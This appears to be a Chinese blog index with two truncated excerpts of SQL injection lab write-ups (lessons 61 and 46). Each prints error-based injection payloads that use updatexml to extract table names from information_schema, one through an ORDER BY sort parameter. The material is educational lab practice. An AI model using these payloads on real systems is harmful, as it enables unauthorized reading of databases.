摘要:
lesson-61 ?id=1' ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges') 阅读全文
摘要:
1.lesson-46 报错注入 判断注入: 整型注入 一部分代码,是是查询的排序语句,所以不能用union select 联合查询 SELECT * FROM users ORDER BY $id 查数据库名: ?sort=1 and updatexml(1,concat(0x7e,(select 阅读全文